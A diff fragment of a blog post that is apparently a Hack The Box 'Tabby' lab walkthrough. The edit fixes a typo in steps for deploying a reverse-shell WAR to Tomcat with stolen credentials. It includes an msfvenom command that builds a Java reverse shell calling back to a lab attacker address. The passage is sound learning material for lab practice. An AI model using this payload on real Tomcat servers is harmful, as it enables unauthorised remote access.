Cristi075/cristi075.github.io/_posts/2020-12-09-HTB Tabby writeup.markdown

 When we try to use the newly found credentials in the manager web UI, the login fails.
 This is probably because tomcat does not have the manager-gui role.
 To get around this, we'll upload our payload using the deploy endpoint & cURL.
 First, we'll create a payload (a reverse shell) using msfvenom.
 Then, we'll upload it to the server using the tomcat account.
-And after that we'll open a listener using nc and go to the URL coresponding to our payload in a browser in order to run it.
+And after that we'll open a listener using nc and go to the URL corresponding to our payload in a browser in order to run it.

 {%highlight bash%}
 msfvenom -p java/shell_reverse_tcp lhost=10.10.14.62 lport=1337 -f war -o n00b.war